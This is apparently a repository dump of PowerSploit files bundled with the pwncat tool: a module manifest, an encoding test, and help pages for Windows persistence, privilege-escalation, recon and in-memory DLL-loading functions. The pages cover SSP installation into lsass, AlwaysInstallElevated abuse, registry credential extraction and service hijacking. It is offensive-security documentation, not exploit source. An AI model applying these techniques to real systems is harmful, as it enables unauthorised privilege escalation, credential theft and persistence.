3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'ScriptModification.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Script Preparation/Modification Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1',
29 | 'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md'
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/ScriptModification/ScriptModification.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/ScriptModification/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module ScriptModification`
7 |
8 | To see the commands imported, type `Get-Command -Module ScriptModification`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Tests/PowerSploit.tests.ps1:
--------------------------------------------------------------------------------
1 | Set-StrictMode -Version Latest
2 |
3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.."
5 |
6 | filter Assert-NotLittleEndianUnicode {
7 | [CmdletBinding()]
8 | param (
9 | [Parameter(Mandatory = $True,
10 | ValueFromPipelineByPropertyName = $True,
11 | ValueFromPipeline = $True)]
12 | [Alias('FullName')]
13 | [String[]]
14 | $FilePath
15 | )
16 |
17 | $LittleEndianMarker = 48111 # 0xBBEF
18 |
19 | Write-Verbose "Current file: $FilePath"
20 | Write-Debug "Current file: $FilePath"
21 |
22 | if ([System.IO.Directory]::Exists($FilePath)) {
23 | Write-Debug "File is a directory."
24 | return
25 | }
26 |
27 | if (-not [System.IO.File]::Exists($FilePath)) {
28 | Write-Debug "File does not exist."
29 | return
30 | }
31 |
32 | $FileBytes = Get-Content -TotalCount 3 -Encoding Byte -Path $FilePath
33 |
34 | if ($FileBytes.Length -le 2) {
35 | Write-Debug "File must be at least 2 bytes in length."
36 | return
37 | }
38 |
39 | if ([BitConverter]::ToUInt16($FileBytes, 0) -eq $LittleEndianMarker) {
40 | Write-Debug "File contains little endian unicode marker."
41 | throw "$_ is little-endian unicode encoded."
42 | }
43 | }
44 |
45 | Describe 'ASCII encoding of all scripts' {
46 | It 'should not contain little-endian unicode encoded scripts or modules' {
47 | { Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw
48 | }
49 | }
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Persistence/Get-SecurityPackage.md:
--------------------------------------------------------------------------------
1 | # Get-SecurityPackage
2 |
3 | ## SYNOPSIS
4 | Enumerates all loaded security packages (SSPs).
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-SecurityPackage
15 | ```
16 |
17 | ## DESCRIPTION
18 | Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
19 | It also parses the returned SecPkgInfo struct array.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-SecurityPackage
26 | ```
27 |
28 | ## PARAMETERS
29 |
30 | ## INPUTS
31 |
32 | ## OUTPUTS
33 |
34 | ## NOTES
35 |
36 | ## RELATED LINKS
37 |
38 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Persistence/Install-SSP.md:
--------------------------------------------------------------------------------
1 | # Install-SSP
2 |
3 | ## SYNOPSIS
4 | Installs a security support provider (SSP) dll.
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Install-SSP [[-Path] ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Install-SSP installs an SSP dll.
19 | Installation involves copying the dll to
20 | %windir%\System32 and adding the name of the dll to
21 | HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Install-SSP -Path .\mimilib.dll
28 | ```
29 |
30 | ## PARAMETERS
31 |
32 | ### -Path
33 | {{Fill Path Description}}
34 |
35 | ```yaml
36 | Type: String
37 | Parameter Sets: (All)
38 | Aliases:
39 |
40 | Required: False
41 | Position: 1
42 | Default value: None
43 | Accept pipeline input: False
44 | Accept wildcard characters: False
45 | ```
46 |
47 | ## INPUTS
48 |
49 | ## OUTPUTS
50 |
51 | ## NOTES
52 | The SSP dll must match the OS architecture.
53 | i.e.
54 | You must have a 64-bit SSP dll
55 | if you are running a 64-bit OS.
56 | In order for the SSP dll to be loaded properly
57 | into lsass, the dll must export SpLsaModeInitialize.
58 |
59 | ## RELATED LINKS
60 |
61 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Add-ServiceDacl.md:
--------------------------------------------------------------------------------
1 | # Add-ServiceDacl
2 |
3 | ## SYNOPSIS
4 | Adds a Dacl field to a service object returned by Get-Service.
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Add-ServiceDacl [-Name]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
18 | Dacl field to each object.
19 | It does this by opening a handle with ReadControl for the
20 | service with using the GetServiceHandle Win32 API call and then uses
21 | QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-Service | Add-ServiceDacl
28 | ```
29 |
30 | Add Dacls for every service the current user can read.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service -Name VMTools | Add-ServiceDacl
35 | ```
36 |
37 | Add the Dacl to the VMTools service object.
38 |
39 | ## PARAMETERS
40 |
41 | ### -Name
42 | An array of one or more service names to add a service Dacl for.
43 | Passable on the pipeline.
44 |
45 | ```yaml
46 | Type: String[]
47 | Parameter Sets: (All)
48 | Aliases: ServiceName
49 |
50 | Required: True
51 | Position: 1
52 | Default value: None
53 | Accept pipeline input: True (ByPropertyName, ByValue)
54 | Accept wildcard characters: False
55 | ```
56 |
57 | ## INPUTS
58 |
59 | ## OUTPUTS
60 |
61 | ### ServiceProcess.ServiceController
62 |
63 | ## NOTES
64 |
65 | ## RELATED LINKS
66 |
67 | [https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)
68 |
69 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Find-PathDLLHijack.md:
--------------------------------------------------------------------------------
1 | # Find-PathDLLHijack
2 |
3 | ## SYNOPSIS
4 | Finds all directories in the system %PATH% that are modifiable by the current user.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Find-PathDLLHijack
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath
18 | to return the folder paths the current user can write to.
19 | On Windows 7, if wlbsctrl.dll is
20 | written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search
21 | order loading.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Find-PathDLLHijack
28 | ```
29 |
30 | Finds all %PATH% .DLL hijacking opportunities.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.HijackableDLL.Path
39 |
40 | ## NOTES
41 |
42 | ## RELATED LINKS
43 |
44 | [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ModifiableRegistryAutoRun.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableRegistryAutoRun
2 |
3 | ## SYNOPSIS
4 | Returns any elevated system autoruns in which the current user can
5 | modify part of the path string.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiableRegistryAutoRun
15 | ```
16 |
17 | ## DESCRIPTION
18 | Enumerates a number of autorun specifications in HKLM and filters any
19 | autoruns through Get-ModifiablePath, returning any file/config locations
20 | in the found path strings that the current user can modify.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-ModifiableRegistryAutoRun
27 | ```
28 |
29 | Return vulneable autorun binaries (or associated configs).
30 |
31 | ## PARAMETERS
32 |
33 | ## INPUTS
34 |
35 | ## OUTPUTS
36 |
37 | ### PowerUp.ModifiableRegistryAutoRun
38 |
39 | Custom PSObject containing results.
40 |
41 | ## NOTES
42 |
43 | ## RELATED LINKS
44 |
45 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ModifiableScheduledTaskFile.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableScheduledTaskFile
2 |
3 | ## SYNOPSIS
4 | Returns scheduled tasks where the current user can modify any file
5 | in the associated task action string.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiableScheduledTaskFile
15 | ```
16 |
17 | ## DESCRIPTION
18 | Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
19 | and parses the XML specification for each task, extracting the command triggers.
20 | Each trigger string is filtered through Get-ModifiablePath, returning any file/config
21 | locations in the found path strings that the current user can modify.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-ModifiableScheduledTaskFile
28 | ```
29 |
30 | Return scheduled tasks with modifiable command strings.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.ModifiableScheduledTaskFile
39 |
40 | Custom PSObject containing results.
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ModifiableService.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableService
2 |
3 | ## SYNOPSIS
4 | Enumerates all services and returns services for which the current user can modify the binPath.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ModifiableService
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
18 | the current user has rights to change the service configuration.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-ModifiableService
25 | ```
26 |
27 | Get a set of potentially exploitable services.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.ModifiablePath
36 |
37 | ## NOTES
38 |
39 | ## RELATED LINKS
40 |
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ModifiableServiceFile.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableServiceFile
2 |
3 | ## SYNOPSIS
4 | Enumerates all services and returns vulnerable service files.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ModifiableServiceFile
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates all services by querying the WMI win32_service class.
18 | For each service,
19 | it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine
20 | if the current user has rights to modify the service binary itself or any associated
21 | arguments.
22 | If the associated binary (or any configuration files) can be overwritten,
23 | privileges may be able to be escalated.
24 |
25 | ## EXAMPLES
26 |
27 | ### -------------------------- EXAMPLE 1 --------------------------
28 | ```
29 | Get-ModifiableServiceFile
30 | ```
31 |
32 | Get a set of potentially exploitable service binares/config files.
33 |
34 | ## PARAMETERS
35 |
36 | ## INPUTS
37 |
38 | ## OUTPUTS
39 |
40 | ### PowerUp.ModifiablePath
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-RegistryAlwaysInstallElevated.md:
--------------------------------------------------------------------------------
1 | # Get-RegistryAlwaysInstallElevated
2 |
3 | ## SYNOPSIS
4 | Checks if any of the AlwaysInstallElevated registry keys are set.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-RegistryAlwaysInstallElevated
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
18 | or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
19 | are set, $False otherwise.
20 | If one of these keys are set, then all .MSI files run with
21 | elevated permissions, regardless of current user permissions.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-RegistryAlwaysInstallElevated
28 | ```
29 |
30 | Returns $True if any of the AlwaysInstallElevated registry keys are set.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### System.Boolean
39 |
40 | $True if RegistryAlwaysInstallElevated is set, $False otherwise.
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-RegistryAutoLogon.md:
--------------------------------------------------------------------------------
1 | # Get-RegistryAutoLogon
2 |
3 | ## SYNOPSIS
4 | Finds any autologon credentials left in the registry.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-RegistryAutoLogon
14 | ```
15 |
16 | ## DESCRIPTION
17 | Checks if any autologon accounts/credentials are set in a number of registry locations.
18 | If they are, the credentials are extracted and returned as a custom PSObject.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-RegistryAutoLogon
25 | ```
26 |
27 | Finds any autologon credentials left in the registry.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.RegistryAutoLogon
36 |
37 | Custom PSObject containing autologin credentials found in the registry.
38 |
39 | ## NOTES
40 |
41 | ## RELATED LINKS
42 |
43 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb)
44 |
45 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-ServiceDetail.md:
--------------------------------------------------------------------------------
1 | # Get-ServiceDetail
2 |
3 | ## SYNOPSIS
4 | Returns detailed information about a specified service by querying the
5 | WMI win32_service class for the specified service name.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ServiceDetail [-Name]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on
19 | the pipeline object returned by Get-Service, extracts out the service name, queries the
20 | WMI win32_service class for the specified service for details like binPath, and outputs
21 | everything.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-ServiceDetail -Name VulnSVC
28 | ```
29 |
30 | Gets detailed information about the 'VulnSVC' service.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service VulnSVC | Get-ServiceDetail
35 | ```
36 |
37 | Gets detailed information about the 'VulnSVC' service.
38 |
39 | ## PARAMETERS
40 |
41 | ### -Name
42 | An array of one or more service names to query information for.
43 |
44 | ```yaml
45 | Type: String[]
46 | Parameter Sets: (All)
47 | Aliases: ServiceName
48 |
49 | Required: True
50 | Position: 1
51 | Default value: None
52 | Accept pipeline input: True (ByPropertyName, ByValue)
53 | Accept wildcard characters: False
54 | ```
55 |
56 | ## INPUTS
57 |
58 | ## OUTPUTS
59 |
60 | ### System.Management.ManagementObject
61 |
62 | ## NOTES
63 |
64 | ## RELATED LINKS
65 |
66 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-UnattendedInstallFile.md:
--------------------------------------------------------------------------------
1 | # Get-UnattendedInstallFile
2 |
3 | ## SYNOPSIS
4 | Checks several locations for remaining unattended installation files,
5 | which may have deployment credentials.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-UnattendedInstallFile
15 | ```
16 |
17 | ## DESCRIPTION
18 | {{Fill in the Description}}
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-UnattendedInstallFile
25 | ```
26 |
27 | Finds any remaining unattended installation files.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.UnattendedInstallFile
36 |
37 | Custom PSObject containing results.
38 |
39 | ## NOTES
40 |
41 | ## RELATED LINKS
42 |
43 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)
44 |
45 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-UnquotedService.md:
--------------------------------------------------------------------------------
1 | # Get-UnquotedService
2 |
3 | ## SYNOPSIS
4 | Get-UnquotedService Returns the name and binary path for services with unquoted paths
5 | that also have a space in the name.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-UnquotedService
15 | ```
16 |
17 | ## DESCRIPTION
18 | Uses Get-WmiObject to query all win32_service objects and extract out
19 | the binary pathname for each.
20 | Then checks if any binary paths have a space
21 | and aren't quoted.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-UnquotedService
28 | ```
29 |
30 | Get a set of potentially exploitable services.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.UnquotedService
39 |
40 | ## NOTES
41 |
42 | ## RELATED LINKS
43 |
44 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb)
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Invoke-PrivescAudit.md:
--------------------------------------------------------------------------------
1 | # Invoke-PrivescAudit
2 |
3 | ## SYNOPSIS
4 | Executes all functions that check for various Windows privilege escalation opportunities.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-PrivescAudit [-HTMLReport]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Executes all functions that check for various Windows privilege escalation opportunities.
18 |
19 | ## EXAMPLES
20 |
21 | ### -------------------------- EXAMPLE 1 --------------------------
22 | ```
23 | Invoke-PrivescAudit
24 | ```
25 |
26 | Runs all escalation checks and outputs a status report for discovered issues.
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | Invoke-PrivescAudit -HTMLReport
31 | ```
32 |
33 | Runs all escalation checks and outputs a status report to SYSTEM.username.html
34 | detailing any discovered issues.
35 |
36 | ## PARAMETERS
37 |
38 | ### -HTMLReport
39 | Switch.
40 | Write a HTML version of the report to SYSTEM.username.html.
41 |
42 | ```yaml
43 | Type: SwitchParameter
44 | Parameter Sets: (All)
45 | Aliases:
46 |
47 | Required: False
48 | Position: Named
49 | Default value: False
50 | Accept pipeline input: False
51 | Accept wildcard characters: False
52 | ```
53 |
54 | ## INPUTS
55 |
56 | ## OUTPUTS
57 |
58 | ### System.String
59 |
60 | ## NOTES
61 |
62 | ## RELATED LINKS
63 |
64 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Write-UserAddMSI.md:
--------------------------------------------------------------------------------
1 | # Write-UserAddMSI
2 |
3 | ## SYNOPSIS
4 | Writes out a precompiled MSI installer that prompts for a user/group addition.
5 | This function can be used to abuse Get-RegistryAlwaysInstallElevated.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Write-UserAddMSI [[-Path] ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Writes out a precompiled MSI installer that prompts for a user/group addition.
19 | This function can be used to abuse Get-RegistryAlwaysInstallElevated.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Write-UserAddMSI
26 | ```
27 |
28 | Writes the user add MSI to the local directory.
29 |
30 | ## PARAMETERS
31 |
32 | ### -Path
33 | {{Fill Path Description}}
34 |
35 | ```yaml
36 | Type: String
37 | Parameter Sets: (All)
38 | Aliases: ServiceName
39 |
40 | Required: False
41 | Position: 1
42 | Default value: UserAdd.msi
43 | Accept pipeline input: True (ByPropertyName, ByValue)
44 | Accept wildcard characters: False
45 | ```
46 |
47 | ## INPUTS
48 |
49 | ## OUTPUTS
50 |
51 | ### PowerUp.UserAddMSI
52 |
53 | ## NOTES
54 |
55 | ## RELATED LINKS
56 |
57 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Recon/Invoke-RevertToSelf.md:
--------------------------------------------------------------------------------
1 | # Invoke-RevertToSelf
2 |
3 | ## SYNOPSIS
4 | Reverts any token impersonation.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-RevertToSelf [[-TokenHandle] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function uses RevertToSelf() to revert any impersonated tokens.
18 | If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
19 | CloseHandle() is used to close the opened handle.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
26 | ```
27 |
28 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
29 | $Token = Invoke-UserImpersonation -Credential $Cred
30 | Invoke-RevertToSelf -TokenHandle $Token
31 |
32 | ## PARAMETERS
33 |
34 | ### -TokenHandle
35 | An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
36 |
37 | ```yaml
38 | Type: IntPtr
39 | Parameter Sets: (All)
40 | Aliases:
41 |
42 | Required: False
43 | Position: 1
44 | Default value: None
45 | Accept pipeline input: False
46 | Accept wildcard characters: False
47 | ```
48 |
49 | ## INPUTS
50 |
51 | ## OUTPUTS
52 |
53 | ## NOTES
54 |
55 | ## RELATED LINKS
56 |
57 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Recon/Resolve-IPAddress.md:
--------------------------------------------------------------------------------
1 | # Resolve-IPAddress
2 |
3 | ## SYNOPSIS
4 | Resolves a given hostename to its associated IPv4 address.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Resolve-IPAddress [[-ComputerName] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Resolves a given hostename to its associated IPv4 address using
18 | \[Net.Dns\]::GetHostEntry().
19 | If no hostname is provided, the default
20 | is the IP address of the localhost.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Resolve-IPAddress -ComputerName SERVER
27 | ```
28 |
29 | ### -------------------------- EXAMPLE 2 --------------------------
30 | ```
31 | @("SERVER1", "SERVER2") | Resolve-IPAddress
32 | ```
33 |
34 | ## PARAMETERS
35 |
36 | ### -ComputerName
37 | {{Fill ComputerName Description}}
38 |
39 | ```yaml
40 | Type: String[]
41 | Parameter Sets: (All)
42 | Aliases: HostName, dnshostname, name
43 |
44 | Required: False
45 | Position: 1
46 | Default value: $Env:COMPUTERNAME
47 | Accept pipeline input: True (ByPropertyName, ByValue)
48 | Accept wildcard characters: False
49 | ```
50 |
51 | ## INPUTS
52 |
53 | ### String
54 |
55 | Accepts one or more IP address strings on the pipeline.
56 |
57 | ## OUTPUTS
58 |
59 | ### System.Management.Automation.PSCustomObject
60 |
61 | A custom PSObject with the ComputerName and IPAddress.
62 |
63 | ## NOTES
64 |
65 | ## RELATED LINKS
66 |
67 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/ScriptModification/Out-CompressedDll.md:
--------------------------------------------------------------------------------
1 | # Out-CompressedDll
2 |
3 | ## SYNOPSIS
4 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
5 |
6 | PowerSploit Function: Out-CompressedDll
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Out-CompressedDll [-FilePath]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Out-CompressedDll -FilePath evil.dll
26 | ```
27 |
28 | Description
29 | -----------
30 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
31 |
32 | ## PARAMETERS
33 |
34 | ### -FilePath
35 | Specifies the path to a managed executable.
36 |
37 | ```yaml
38 | Type: String
39 | Parameter Sets: (All)
40 | Aliases:
41 |
42 | Required: True
43 | Position: 1
44 | Default value: None
45 | Accept pipeline input: False
46 | Accept wildcard characters: False
47 | ```
48 |
49 | ## INPUTS
50 |
51 | ## OUTPUTS
52 |
53 | ## NOTES
54 | Only pure MSIL-based dlls can be loaded using this technique.
55 | Native or IJW ('it just works' - mixed-mode) dlls will not load.
56 |
57 | ## RELATED LINKS
58 |
59 | [http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html)
60 |
61 |
--------------------------------------------------------------------------------
/pwncat/data/loader.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/data/loader.dll
--------------------------------------------------------------------------------
/pwncat/data/reports/linux.md:
--------------------------------------------------------------------------------
1 | {% extends "generic.md" %}
2 |
3 | {% block platform %}
4 | ## Linux Specific Info!
5 | {% endblock %}
6 |
--------------------------------------------------------------------------------
/pwncat/data/reports/windows.md:
--------------------------------------------------------------------------------
1 | {% extends "generic.md" %}
2 |
3 | {% block platform %}
4 | ## Windows Specific Info!
5 |
6 | {{ [["Hello", "World"], ["Goodbye", "World"]] | table(headers=True) }}
7 |
8 | {% endblock %}
9 |
--------------------------------------------------------------------------------
/pwncat/data/stagetwo.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/data/stagetwo.dll
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/__init__.py:
--------------------------------------------------------------------------------
